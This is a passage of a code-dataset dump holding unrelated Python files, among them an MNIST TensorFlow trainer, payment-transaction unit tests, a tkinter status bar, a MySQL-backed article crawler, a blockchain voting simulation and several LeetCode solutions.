tweets_csv.write(\",delta_t,cluster\")\n\ntweets_csv.write(\"\\n\")\n\nif JSON:\n number_tweets = len(formatted_tweets[\"tweets\"])\nelif CSV:\n number_tweets = len(formatted_tweets)\n\nlist_id_formatted_tweets = formatted_tweets[\"id\"].tolist()\n\nfor tweet_analysis_index in range(len(tweets_analysis[\"tweets\"])):\n\n print(tweet_analysis_index, len(tweets_analysis[\"tweets\"]))\n\n analysis_tweet_id = tweets_analysis[\"tweets\"][tweet_analysis_index][\"tweet_id\"]\n if JSON:\n tweet_formatted_index = formatted_tweets[\"tweets\"][\"id\"].index(analysis_tweet_id)\n elif CSV:\n tweet_formatted_index = list_id_formatted_tweets.index(analysis_tweet_id)\n\n target_tweet_analysis = tweets_analysis[\"tweets\"][tweet_analysis_index]\n\n total_joy = average_emotion(target_tweet_analysis, \"joy\")\n total_sadness = average_emotion(target_tweet_analysis, \"sadness\")\n total_anger = average_emotion(target_tweet_analysis, \"anger\")\n total_fear = average_emotion(target_tweet_analysis, \"fear\")\n total_disgust = average_emotion(target_tweet_analysis, \"disgust\")\n total_sentiment = average_sentiment(target_tweet_analysis)\n\n if ELIMINATE_OUTLIERS:\n if total_joy == 0 and total_sadness == 0 and \\\n total_anger == 0 and total_fear == 0 and total_disgust == 0:\n continue\n\n\n tweets_csv.write(str(target_tweet_analysis[\"tweet_id\"]))\n tweets_csv.write(SEP)\n\n if JSON:\n tweets_csv.write(str(formatted_tweets[\"tweets\"][tweet_formatted_index][\"is_fake\"]))\n\n elif CSV:\n tweets_csv.write(str(formatted_tweets[\"is_fake\"].iloc[tweet_formatted_index]))\n\n tweets_csv.write(SEP)\n\n tweets_csv.write(str(total_joy))\n tweets_csv.write(SEP)\n\n tweets_csv.write(str(total_sadness))\n tweets_csv.write(SEP)\n\n tweets_csv.write(str(total_anger))\n tweets_csv.write(SEP)\n\n tweets_csv.write(str(total_fear))\n tweets_csv.write(SEP)\n\n tweets_csv.write(str(total_disgust))\n tweets_csv.write(SEP)\n\n tweets_csv.write(str(total_sentiment))\n tweets_csv.write(SEP)\n\n if CLUSTER:\n tweets_csv.write(str(df_file[\"delta_t\"][tweet_analysis_index]))\n tweets_csv.write(SEP)\n\n tweets_csv.write(str(df_file[\"cluster\"][tweet_analysis_index]))\n tweets_csv.write(\"\\n\")\n\n tweet_formatted_index += 1\n\ntweets_csv.close()\n","sub_path":"backend/dataset_creation.py","file_name":"dataset_creation.py","file_ext":"py","file_size_in_byte":4296,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"366888361","text":"from tests.test_helper import *\nfrom datetime import datetime\nfrom datetime import date\n\nclass TestTransaction(unittest.TestCase):\n @raises_with_regexp(KeyError, \"'Invalid keys: bad_key'\")\n def test_clone_transaction_raises_exception_with_bad_keys(self):\n Transaction.clone_transaction(\"an id\", {\"bad_key\": \"value\"})\n\n @raises_with_regexp(KeyError, \"'Invalid keys: bad_key'\")\n def test_sale_raises_exception_with_bad_keys(self):\n Transaction.sale({\"bad_key\": \"value\"})\n\n @raises_with_regexp(KeyError, \"'Invalid keys: credit_card\\[bad_key\\]'\")\n def test_sale_raises_exception_with_nested_bad_keys(self):\n Transaction.sale({\"credit_card\": {\"bad_key\": \"value\"}})\n\n @raises_with_regexp(KeyError, \"'Invalid keys: bad_key'\")\n def test_tr_data_for_sale_raises_error_with_bad_keys(self):\n Transaction.tr_data_for_sale({\"bad_key\": \"value\"}, \"http://example.com\")\n\n @raises(NotFoundError)\n def test_finding_empty_id_raises_not_found_exception(self):\n Transaction.find(\" \")\n\n @raises(NotFoundError)\n def test_finding_none_raises_not_found_exception(self):\n Transaction.find(None)\n\n def test_constructor_includes_disbursement_information(self):\n attributes = {\n 'amount': '27.00',\n 'tax_amount': '1.00',\n 'customer_id': '4096',\n 'merchant_account_id': '8192',\n 'order_id': '106601',\n 'channel': '101',\n 'payment_method_token': 'sometoken',\n 'purchase_order_number': '20202',\n 'recurring': 'False',\n 'disbursement_details': {\n 'settlement_amount': '27.00',\n 'settlement_currency_iso_code': 'USD',\n 'settlement_currency_exchange_rate': '1',\n 'disbursement_date': date(2013, 4, 10),\n 'funds_held': False\n }\n }\n\n transaction = Transaction(None, attributes)\n\n self.assertEqual(transaction.disbursement_details.settlement_amount, Decimal('27.00'))\n self.assertEqual(transaction.disbursement_details.settlement_currency_iso_code, 'USD')\n self.assertEqual(transaction.disbursement_details.settlement_currency_exchange_rate, Decimal('1'))\n self.assertEqual(transaction.disbursement_details.disbursement_date, date(2013, 4, 10))\n self.assertEqual(transaction.disbursement_details.funds_held, False)\n self.assertEqual(transaction.is_disbursed, True)\n\n def test_transaction_handles_nil_risk_data(self):\n attributes = {\n 'amount': '27.00',\n 'tax_amount': '1.00',\n 'customer_id': '4096',\n 'merchant_account_id': '8192',\n 'order_id': '106601',\n 'channel': '101',\n 'payment_method_token': 'sometoken',\n 'purchase_order_number': '20202',\n 'recurring': 'False',\n }\n\n transaction = Transaction(None, attributes)\n\n self.assertEqual(transaction.risk_data, None)\n\n def test_is_disbursed_false(self):\n attributes = {\n 'amount': '27.00',\n 'tax_amount': '1.00',\n 'customer_id': '4096',\n 'merchant_account_id': '8192',\n 'order_id': '106601',\n 'channel': '101',\n 'payment_method_token': 'sometoken',\n 'purchase_order_number': '20202',\n 'recurring': 'False',\n 'disbursement_details': {\n 'settlement_amount': None,\n 'settlement_currency_iso_code': None,\n 'settlement_currency_exchange_rate': None,\n 'disbursement_date': None,\n 'funds_held': None,\n }\n }\n\n transaction = Transaction(None, attributes)\n\n self.assertEqual(transaction.is_disbursed, False)\n","sub_path":"tests/unit/test_transaction.py","file_name":"test_transaction.py","file_ext":"py","file_size_in_byte":3807,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"324622364","text":"# relative to my_mnist_8.py: plot test set accuracy in steps as well\n# my way of doing this is to train and save checkpoints first; then load the checkpoints successively to make predictions on the test\n# batches (model 200 applied to first test batch, model 400 applied to second test batch, model 600 applied to third test batch, etc)\n\nimport argparse\nimport sys\nfrom tensorflow.examples.tutorials.mnist import input_data\nimport tensorflow as tf\nimport numpy as np\nimport os\n\nFLAGS = None\ntf.summary.FileWriterCache.clear()\n\ndef weight_variable(shape):\n '''use this function to initialize weights of given shape'''\n initial = tf.truncated_normal(shape, stddev=0.1)\n return tf.Variable(initial)\n\ndef bias_variable(shape):\n '''use this function to initialize biases of given shape'''\n initial = tf.constant(0.1, shape=shape)\n return tf.Variable(initial)\n\ndef conv2d(x, W):\n '''\n x: input tensor (batch_size, height, width, input_channels)\n W: filter tensor (filter_height, filter_width, input_channels, num_of_filters)\n output: (batch_size, output_height, output_width, num_of_filters)\n '''\n return tf.nn.conv2d(x, W, strides=[1, 1, 1, 1], padding='SAME')\n\ndef max_pool_2x2(x):\n '''\n x: input tensor (batch_size, height, width, input_channels)\n output: (batch_size, output_height, output_width, input_channels)\n '''\n return tf.nn.max_pool(x, ksize=[1, 2, 2, 1],\n strides=[1, 2, 2, 1], padding='SAME')\n\ndef main(_):\n \n # Import data\n mnist = tf.contrib.learn.datasets.load_dataset(\"mnist\")\n train_data = tf.data.Dataset.from_tensor_slices(mnist.train.images) # mnist.train.images is np.array\n train_labels = tf.data.Dataset.from_tensor_slices(np.asarray(mnist.train.labels, dtype=np.int32)).map(lambda z: tf.one_hot(z, 10))\n train_dataset = tf.data.Dataset.zip((train_data, train_labels)).repeat().batch(100)\n\n eval_data = tf.data.Dataset.from_tensor_slices(mnist.test.images) \n eval_labels = tf.data.Dataset.from_tensor_slices(np.asarray(mnist.test.labels, dtype=np.int32)).map(lambda z: tf.one_hot(z, 10))\n eval_dataset = tf.data.Dataset.zip((eval_data, eval_labels)).repeat().batch(1000)\n\n # create general iterator\n iterator = tf.data.Iterator.from_structure(train_dataset.output_types, train_dataset.output_shapes)\n next_element = iterator.get_next()\n\n # define initialization operations by dataset type\n training_init_op = iterator.make_initializer(train_dataset)\n eval_init_op = iterator.make_initializer(eval_dataset)\n\n W_conv1 = weight_variable([5, 5, 1, 32]) # weights of first conv layer\n b_conv1 = bias_variable([32]) # biases of first conv layer\n x_image_summary = tf.summary.image('input', tf.reshape(next_element[0], [-1, 28, 28, 1]), 3)\n x_image = tf.reshape(next_element[0], [-1,28,28,1]) # reshape x into 2d images\n h_conv1 = tf.nn.relu(conv2d(x_image, W_conv1) + b_conv1) # first layer convolution followed by relu activation\n h_pool1 = max_pool_2x2(h_conv1) # first max pool\n W_conv2 = weight_variable([5, 5, 32, 64]) # weights of second conv layer\n b_conv2 = bias_variable([64]) # biases of second conv layer\n h_conv2 = tf.nn.relu(conv2d(h_pool1, W_conv2) + b_conv2) # second layer convolution followed by relu activation\n h_pool2 = max_pool_2x2(h_conv2) # second max pool\n W_fc1 = weight_variable([7 * 7 * 64, 1024]) # weights of first fully connected layer\n b_fc1 = bias_variable([1024]) # biases of first fully connected layer\n h_pool2_flat = tf.reshape(h_pool2, [-1, 7*7*64]) # flatten the output from second max pool\n h_fc1 = tf.nn.relu(tf.matmul(h_pool2_flat, W_fc1) + b_fc1) # output of first fully connected layer\n keep_prob = tf.placeholder(tf.float32) # dropout probability\n h_fc1_drop = tf.nn.dropout(h_fc1, keep_prob) # modify output of first fully connected layer by dropout\n W_fc2 = weight_variable([1024, 10]) # weights of second fully connected layer\n b_fc2 = bias_variable([10]) # biases of second fully connected layer\n y_conv = tf.matmul(h_fc1_drop, W_fc2) + b_fc2 # output of second fully connected layer\n cross_entropy = tf.reduce_mean(tf.nn.softmax_cross_entropy_with_logits(labels=next_element[1], logits=y_conv)) # loss operation\n train_step = tf.train.AdamOptimizer(1e-4).minimize(cross_entropy) # train operation \n correct_prediction = tf.equal(tf.argmax(y_conv, 1), tf.argmax(next_element[1], 1))\n accuracy = tf.reduce_mean(tf.cast(correct_prediction, tf.float32))\n accuracy_scalar = tf.summary.scalar(\"accuracy\",accuracy)\n\n # Add ops to save and restore all the variables.\n home = os.getenv('HOME')\n save_path = home + '/Deep_Learning_Examples/MNIST_tensorflow/checkpoints/'\n model_name = 'my_model'\n if not os.path.exists(save_path):\n os.makedirs(save_path)\n saver = tf.train.Saver()\n save_path_full = os.path.join(save_path, model_name)\n\n # let the session begin\n sess = tf.InteractiveSession()\n tf.global_variables_initializer().run()\n\n # define writers\n summaries_dir = home + '/Deep_Learning_Examples/MNIST_tensorflow/board'\n train_writer = tf.summary.FileWriter(summaries_dir + '/train', sess.graph)\n test_writer = tf.summary.FileWriter(summaries_dir + '/test')\n\n # Train\n sess.run(training_init_op)\n for step in range(1000):\n sess.run(train_step, feed_dict={keep_prob: 0.5})\n if (step+1) % 20 == 0:\n sum1 = sess.run(x_image_summary)\n sum2 = sess.run(accuracy_scalar, feed_dict={keep_prob: 1})\n train_writer.add_summary(sum1,step)\n train_writer.add_summary(sum2,step)\n\n if (step+1) % 200 == 0:\n save_path_destination = saver.save(sess, save_path_full, step+1)\n print(\"Model {} saved in path {}\".format(step+1, save_path_destination))\n\n # Test trained model\n sess.run(eval_init_op)\n for step in range(1000):\n if (step + 1) % 200 == 0:\n new_saver = tf.train.import_meta_graph(save_path + 'my_model-' + str(step+1) + '.meta')\n new_saver.restore(sess, save_path + 'my_model-' + str(step+1))\n sum3, validation_accuracy = sess.run([accuracy_scalar, accuracy], feed_dict={keep_prob: 1})\n test_writer.add_summary(sum3, step)\n print(validation_accuracy)\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser()\n parser.add_argument('--data_dir', type=str, default='/tmp/tensorflow/mnist/input_data',\n help='Directory for storing input data')\n FLAGS, unparsed = parser.parse_known_args()\n tf.app.run(main=main, argv=[sys.argv[0]] + unparsed)","sub_path":"MNIST_tensorflow/code/my_mnist_9.py","file_name":"my_mnist_9.py","file_ext":"py","file_size_in_byte":6387,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"535167139","text":"import tkinter as tk\r\nfrom tkinter import ttk\r\n\r\nfrom extendedTk import FadingLabel\r\nfrom extendedStyle import style_configure\r\n\r\nclass Statusbar(tk.Frame):\r\n def __init__(self, master=None, **kw):\r\n tk.Frame.__init__(self, master, {}, **kw)\r\n\r\n self.status = FadingLabel(self, text=\"Status\")\r\n\r\n self.insert_pos = tk.StringVar()\r\n label = ttk.Label(self, textvariable=self.insert_pos)\r\n self.insert_pos.set(\"Ln: -| Col: -\")\r\n\r\n # style \r\n style_configure(self, \"Statusbar\")\r\n style_configure(self.status, \"Statusbar.Child\")\r\n style_configure(label, \"Statusbar.Child\")\r\n\r\n # grid\r\n self.columnconfigure(1, weight=1)\r\n\r\n self.status.grid(row=0, column=0, sticky=tk.W, padx=8, pady=2)\r\n label.grid(row=0, column=1, sticky=tk.E, padx=32, pady=2)\r\n\r\n def write(self, msg):\r\n self.status.write(msg)\r\n\r\n def update_insert_label(self, event):\r\n ln, col = event.widget.index(\"insert\").split(\".\")\r\n self.insert_pos.set(\"Ln: {}| Col: {}\".format(ln, col))\r\n\r\n ","sub_path":"statusbar.py","file_name":"statusbar.py","file_ext":"py","file_size_in_byte":1073,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"39710314","text":"class Solution:\n def postorder(self, root: 'Node') -> List[int]:\n stack=[]\n order=[]\n if root:\n stack.append(root)\n while stack:\n node=stack.pop()\n order.append(node.val)\n for child in node.children:\n stack.append(child)\n return reversed(order)\n","sub_path":"lc/590.py","file_name":"590.py","file_ext":"py","file_size_in_byte":342,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"136772189","text":"# Несколько входов и выходов\ndef scal_sum(matrix, matrix2):\n sum = 0\n for i in range(len(matrix)):\n sum = matrix[i] + matrix2[i]\n return sum\n\n\n# Да здравствует Спагети КОД!!!!\ninput = [0.5, 0.3, 0.2]\ngoal_pred = [1, 0, 2]\nweight = [[0.5, 2, 1],\n [0.3, 0.7, 2],\n [1, 4, 1]]\nalpha = 0.1\nalpha = 0.1\npred = [0, 0, 0]\n\nfor iter in range(0, 100):\n print(f\"{iter}\")\n\n pred[0] = scal_sum(input, weight[0])\n pred[1] = scal_sum(input, weight[1])\n pred[2] = scal_sum(input, weight[2])\n\n # Изменяю веса первого выхода\n delta = (pred[0] - goal_pred[0]) * alpha\n for i in range(0, 3):\n weight[0][i] = weight[0][i] - delta * input[0]\n\n delta = (pred[1] - goal_pred[1]) * alpha\n for i in range(0, 3):\n weight[1][i] = weight[1][i] - delta * input[1]\n\n delta = (pred[2] - goal_pred[2]) * alpha\n for i in range(0, 3):\n weight[2][i] = weight[2][i] - delta * input[2]\n\n print(f\"\\t 1: W1 :{weight[0][0]} W2 :{weight[0][1]} W3 :{weight[0][2]} Pred: {pred[0]} GoalPred: {goal_pred[0]}\")\n print(f\"\\t 2: W1 :{weight[1][0]} W2 :{weight[1][1]} W3 :{weight[1][2]} Pred: {pred[1]} GoalPred: {goal_pred[1]}\")\n print(f\"\\t 3: W1 :{weight[2][0]} W2 :{weight[2][1]} W3 :{weight[2][2]} Pred: {pred[2]} GoalPred: {goal_pred[2]}\")\n","sub_path":"Control/2_controll.py","file_name":"2_controll.py","file_ext":"py","file_size_in_byte":1361,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"308544597","text":"import html_downloader, html_parser\nimport sqlproc\nimport time, random\n\nif __name__ == '__main__':\n print(\"############ 开始……\")\n\n host = 'localhost'\n port = 3306\n username = 'root'\n password = 'root'\n db = 'cola'\n charset = 'utf8'\n sp = sqlproc.SqlProc(host, port, username, password, db, charset)\n downloader = html_downloader.HtmlDownloader()\n parser = html_parser.HtmlParser()\n\n select_sql = \"select id, ifcrawed, link from linkstat limit %s, %s\"\n update_sql = \"update linkstat set ifcrawed = 1 where id = %s\"\n insert_sql = \"insert into commonsense(arttitle, summary, artcont) values(%s, %s, %s)\"\n\n n = 100\n totalcount = 5760 #需要修改\n no_lst = list(range(0, totalcount, 100))\n no_lst.append(totalcount)\n\n for no in no_lst:\n if totalcount - no < 100:\n n = totalcount - no\n\n lst_link = sp.selectData(select_sql, (no, n))\n if lst_link == -1:\n '''查询失败,直接跳过'''\n continue\n\n for link in lst_link:\n print('crawing...... {}'.format(link), end=\" \")\n uid = link['id']\n url = link['link']\n ifcrawed = link['ifcrawed']\n\n if ifcrawed == 1:\n '''该链接已经爬取过,直接跳过'''\n continue\n\n html_cont = downloader.download(url)\n if html_cont is None:\n '''获取内容为空, 直接跳过'''\n continue\n\n parse_result = parser.parse(html_cont)\n if parse_result is not None:\n print(parse_result, end=\" \")\n bs, code = sp.insertData(insert_sql, parse_result)\n if bs:\n print('插入成功! 第 {} 条记录。'.format(code), end=\" \")\n if sp.updateData(update_sql, uid):\n print('更新成功, Done!')\n else:\n print('更新失败, Undo!')\n else:\n print('插入失败!')\n else:\n print('爬取失败!')\n time.sleep(random.random())\n","sub_path":"crawcommsens/spider_main.py","file_name":"spider_main.py","file_ext":"py","file_size_in_byte":2158,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"389418070","text":"import subprocess\nimport json\nimport os\n\nimport sublime\n\nSETTINGS_FILE = 'Gide.sublime-settings'\n\n\ndef set_status(msg):\n \"\"\"Print a message to the active window's status bar.\n \"\"\"\n msg = 'Gide: {0}'.format(msg)\n sublime.active_window().active_view().set_status('Gide', msg)\n\n\ndef info_for_symbol(view, point):\n \"\"\"Extract information about the symbol given by `point`.\n \"\"\"\n filename = view.file_name()\n if not filename:\n return {}\n\n pos = '{0}:#{1}'.format(filename, point)\n buf = view.substr(sublime.Region(0, view.size()))\n stdout, stderr, ret = run_command(\n ['gogetdoc', '-u', '-json', '-modified', '-pos', pos],\n '{0}\\n{1}\\n{2}'.format(filename, view.size(), buf))\n\n if ret != 0:\n debug('No signature for {0}'.format(pos))\n return {}\n\n return json.loads(stdout)\n\n\ndef debug(message, prefix='Gide', level='debug'):\n \"\"\"Print a formatted entry to the console.\n\n Args:\n message (str): A message to print to the console\n prefix (str): An optional prefix\n level (str): One of debug, info, warning, error [Default: debug]\n\n Returns:\n str: Issue a standard console print command.\n \"\"\"\n if get_setting('debug'):\n print('{prefix}: [{level}] {message}'.format(\n message=message,\n prefix=prefix,\n level=level\n ))\n\n\ndef get_setting(name):\n \"\"\"Return the value associated with the setting `name`.\n \"\"\"\n settings = sublime.load_settings(SETTINGS_FILE)\n return settings.get(name, '')\n\n\ndef set_setting(name, value):\n \"\"\"Store and save `name` as `value`.\n \"\"\"\n settings = sublime.load_settings(SETTINGS_FILE)\n settings.set(name, value)\n sublime.save_settings(SETTINGS_FILE)\n\n\ndef load_template(name):\n \"\"\"...\n \"\"\"\n p = os.path.join(os.path.dirname(__file__), os.pardir, 'templates', name)\n with open(p) as temp:\n return temp.read()\n\n\ndef is_golang(view, point=None):\n \"\"\"Return if the given view is Golang source.\n \"\"\"\n if point is None:\n point = view.sel()[0].begin()\n return view.score_selector(point, 'source.go') > 0\n\n\ndef run_command(command, stdin=None):\n \"\"\"Run the given command.\n \"\"\"\n startup_info = None\n if sublime.platform() == 'windows':\n startup_info = subprocess.STARTUPINFO()\n startup_info.dwFlags |= subprocess.STARTF_USESHOWWINDOW\n\n p = subprocess.Popen(command,\n stdin=subprocess.PIPE,\n stderr=subprocess.PIPE,\n stdout=subprocess.PIPE,\n startupinfo=startup_info)\n\n if stdin:\n stdout, stderr = p.communicate(stdin.encode('utf-8'))\n else:\n stdout, stderr = p.communicate()\n\n return stdout.decode('utf-8'), stderr.decode('utf-8'), p.returncode\n","sub_path":"src/util.py","file_name":"util.py","file_ext":"py","file_size_in_byte":2827,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"566130824","text":"import random\nimport sys\nimport time\nfrom uuid import uuid4\nimport logging\nimport requests\n\nlogger = logging.getLogger(__name__)\nlogging.basicConfig(level=logging.INFO)\n\n# CANDIDATES = [\"Narendra Modi\", \"Rahul Gandhi\", \"Arvind Kejriwal\"]\nCANDIDATES = [\"Candidate 1\", \"Candidate 2\", \"Candidate 3\"]\nSERVERS = [\"5000\", \"5001\", \"5002\", \"5003\"]\n\n\ndef register_nodes():\n for server in SERVERS:\n try:\n logging.info(\"> Registering server: \" + \"127.0.0.1:\" + server)\n node_url = \"http://127.0.0.1:\" + server + \"/nodes/register\"\n for s in SERVERS:\n data = {\n \"nodes\": [],\n \"new-node\": \"127.0.0.1:\" + s\n }\n requests.post(node_url, json=data)\n except Exception as e:\n logging.info(str(e))\n\n\ndef votes(max_count):\n count = 0\n while count < max_count:\n count += 1\n delay = random.randrange(1, 3)\n time.sleep(delay)\n candidate = CANDIDATES[random.randrange(0, 3)]\n t = {\n \"nodes\": [],\n \"transaction\": {\n \"sender\": str(uuid4()),\n \"recipient\": candidate,\n \"amount\": 1,\n \"uuid\": str(uuid4())\n }\n }\n try:\n server = SERVERS[random.randrange(0, 4)]\n logging.info(\"> Sending vote for \" + candidate + \" to server: \" + server)\n requests.post(\"http://localhost:\" + server + \"/transactions/new\", json=t)\n except Exception as e:\n logging.error(str(e))\n\n\ndef stop():\n try:\n for server in SERVERS:\n logging.info(\"> Stopping server: \" + server)\n node_url = \"http://127.0.0.1:\" + server + \"/stop\"\n requests.get(node_url)\n requests.get(\"http://127.0.0.1:5000/mine\")\n except Exception as e:\n logging.error(str(e))\n\n\ndef forks():\n try:\n for server in SERVERS:\n node_url = \"http://127.0.0.1:\" + server + \"/nodes/forks\"\n resp = requests.get(node_url)\n data = resp.json()\n logger.info(\"Number of discarded blocks:\" + str(data))\n except Exception as e:\n logging.error(str(e))\n\n\ndef results():\n try:\n prev = None\n for server in SERVERS:\n\n result = {}\n for candidate in CANDIDATES:\n result.update({candidate: 0})\n node_url = \"http://127.0.0.1:\" + server + \"/chain\"\n resp = requests.get(node_url)\n chain = resp.json()[\"chain\"]\n for block in chain:\n for txt in block[\"transactions\"]:\n result[txt[\"recipient\"]] += 1\n prev = result\n # logging.info(\"Server:\" + server + \" result: \" + str(result))\n logging.info(\"Server result: \" + str(prev))\n except Exception as e:\n logging.error(str(e))\n\n\ndef run(num_votes):\n register_nodes()\n votes(num_votes)\n stop()\n results()\n forks()\n\n\nif __name__ == \"__main__\":\n if len(sys.argv) < 2:\n print(\"Usage: python simulation.py \")\n run(int(sys.argv[1]))\n","sub_path":"blockchain/simulation.py","file_name":"simulation.py","file_ext":"py","file_size_in_byte":3127,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"101372129","text":"# coding: utf-8\n\n\ndef build_entry_ui_url(ice_base_url, entry_id):\n \"\"\"\n Builds the URL for client access to an ICE entry via ICE's user interface.\n\n :param ice_base_url: the base URL of the ICE instance (assumed to NOT end with a slash)\n :param entry_id: an ICE identifier for the part. This can be any of 1) The UUID (preferred\n as universally unique), 2) The ICE part number (more likely, though not guaranteed to be\n universally unique, 3) The local ICE primary key for the part.\n Note that in *some* but not all cases, the numeric portion of the ICE part number\n corresponds to the local primary key. This relationship is not reliable across ICE\n instances, and should not be depended on in software.\n :return: the URL\n \"\"\"\n return (\n '%(base_url)s/entry/%(id)s' %\n {\n 'base_url': ice_base_url,\n 'id': entry_id,\n }\n )\n","sub_path":"rest/clients/ice/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":925,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"356983813","text":"import threading\nimport time\n \n \nstop_c = False\n \ndef c(n):\n ti = n\n while not stop_c:\n time.sleep(1)\n ti -= 1\n print('осталось', ti, 'секунд')\n \n if ti == 0:\n print('Время вышло!')\n ti = n\n else:\n continue\n \n \ndef ans(ans):\n global stop_c\n ans = input()\n if ans == '10':\n print(' верно ')\n else:\n print(' неверно ')\n stop_c = True\n \n \no = threading.Thread(target=ans, args=(1, ))\nt = threading.Thread(target=c, args=(15, ))\nprint('сколько будет 5 + 5?')\nprint('у вас есть 15 секунд')\no.start()\nt.start()","sub_path":"threaded_timer.py","file_name":"threaded_timer.py","file_ext":"py","file_size_in_byte":676,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"105241683","text":"\n\nfrom xai.brain.wordbase.verbs._herald import _HERALD\n\n#calss header\nclass _HERALDING(_HERALD, ):\n\tdef __init__(self,): \n\t\t_HERALD.__init__(self)\n\t\tself.name = \"HERALDING\"\n\t\tself.specie = 'verbs'\n\t\tself.basic = \"herald\"\n\t\tself.jsondata = {}\n","sub_path":"xai/brain/wordbase/verbs/_heralding.py","file_name":"_heralding.py","file_ext":"py","file_size_in_byte":242,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"558074960","text":"#!/usr/bin/env python\r\n# -*- coding: utf-8 -*-\r\n__version__ = '1.0.0.0'\r\n\r\n\"\"\"\r\n@brief 简介 \r\n@details 详细信息\r\n@author luoyuediwu\r\n@data 2016-01-06 \r\n\"\"\"\r\nimport re\r\nfrom eventlet import pools\r\nfrom eventlet import semaphore\r\n\r\nclass Pool(pools.Pool):\r\n \"\"\"tsdb连接池\"\"\"\r\n def __init__(self, create_method, min_size=0, max_size=2):\r\n super(Pool, self).__init__(min_size=min_size, max_size=max_size)\r\n self.create_method = create_method\r\n self._pool_mutex = semaphore.Semaphore()\r\n\r\n def create(self):\r\n \"\"\"\r\n 重载父类方法\r\n \"\"\"\r\n return self.create_method()\r\n\r\n def get(self):\r\n \"\"\"\r\n 重载父类方法\r\n \"\"\"\r\n # with self._pool_mutex:\r\n return super(Pool, self).get()\r\n\r\n def put(self, item):\r\n \"\"\"\r\n 重载父类方法\r\n \"\"\"\r\n # with self._pool_mutex:\r\n return super(Pool, self).put(item)\r\n\r\n def empty(self):\r\n \"\"\"\r\n 清空池\r\n \"\"\"\r\n while self.free_items:\r\n self.get().close()\r\n\r\n\r\nclass ConnectionContext(object):\r\n \"\"\"连接上下文\"\"\"\r\n def __init__(self, connection_pool):\r\n self._session = None\r\n self._connection_pool = connection_pool\r\n\r\n def __enter__(self):\r\n self._session = self._connection_pool.get()\r\n return self._session\r\n\r\n def __exit__(self, exc_type, exc_val, exc_tb):\r\n self._connection_pool.put(self._session)\r\n\r\n\r\nclass SingleMeta(type):\r\n \"\"\"单例\"\"\"\r\n def __init__(cls, what, bases=None, dict=None):\r\n super(SingleMeta, cls).__init__(what, bases, dict)\r\n cls._instance = None\r\n\r\n def __call__(cls, *args, **kwargs):\r\n if cls._instance is None:\r\n cls._instance = super(SingleMeta, cls).__call__(*args, **kwargs)\r\n return cls._instance\r\n\r\n\r\ndef parse_tsdb_uri(db_uri):\r\n \"\"\"\r\n 格式化tsdb链接字符串\r\n @param db_uri: xxx://host:port@user/database\r\n @return:\r\n \"\"\"\r\n pattern = re.compile(r\"\"\"\r\n (?P[\\w\\+]+)://\r\n (?:\r\n (?P[^:/]*)\r\n (?::(?P[^/]*))?\r\n @)?\r\n (?:\r\n (?:\r\n \\[(?P[^/]+)\\] |\r\n (?P[^/:]+)\r\n )?\r\n (?::(?P[^/]*))?\r\n )?\r\n (?:/(?P.*))?\r\n \"\"\", re.X)\r\n\r\n m = pattern.match(db_uri)\r\n if m is not None:\r\n components = m.groupdict()\r\n return components\r\n else:\r\n return {}","sub_path":"common/db/pool.py","file_name":"pool.py","file_ext":"py","file_size_in_byte":2596,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"568778844","text":"'''\r\nAccepted on leetcode(1007)\r\ntime - O(N)\r\nspace - O(1)\r\nApproach:\r\n# As we have to check for single number which can replace either A or B. So, that number must be either of element which exist in 0th index(any one index corresponding to A and B)\r\n'''\r\n\r\n\r\nclass Solution:\r\n def minDominoRotations(self, A, B) -> int:\r\n # First we check for A[0], if thats the number then return the minimum replacement count. or else check for B[0]\r\n retVal = self.check(A, B, A[0])\r\n\r\n if retVal != -1 or A[0] == B[0]:\r\n return retVal\r\n return self.check(A, B, B[0])\r\n\r\n def check(self, A, B, x):\r\n a_rot = 0\r\n b_rot = 0\r\n # iterate over either array and check for 3 cases.\r\n for i in range(len(A)):\r\n if A[i] != x and B[i] != x:\r\n return -1\r\n elif A[i] != x:\r\n a_rot += 1\r\n elif B[i] != x:\r\n b_rot += 1\r\n\r\n return min(a_rot, b_rot)","sub_path":"159_MinimumDominoRotations.py","file_name":"159_MinimumDominoRotations.py","file_ext":"py","file_size_in_byte":979,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"645167503","text":"\"\"\"Requests category information\"\"\"\n\nfrom pylinnworks.api_requests.request import Request\n\n\nclass GetInfoRequest(Request):\n url_extension = ''\n info = []\n name_field = ''\n id_field = ''\n default = '00000000-0000-0000-0000-000000000000'\n\n def __init__(self, api_session):\n super().__init__(api_session)\n\n def test_response(self, response):\n assert isinstance(response.json(), list),\\\n response.text + \" is not valid json\"\n return super().test_response(response)\n\n def process_response(self, response):\n self.info = self.get_info()\n self.names = self.get_names()\n self.ids = self.get_ids()\n\n def get_info(self):\n \"\"\"Return information as dict.\"\"\"\n info = []\n for info_field in self.response_dict:\n new_info_dict = {}\n new_info_dict['name'] = info_field[self.name_field]\n new_info_dict['id'] = info_field[self.id_field]\n info.append(new_info_dict)\n return info\n\n def get_names(self):\n \"\"\"Return Info names as list.\"\"\"\n names = []\n for entry in self.info:\n names.append(entry['name'])\n return names\n\n def get_ids(self):\n \"\"\"Return Info IDs as list.\"\"\"\n ids = []\n for entry in 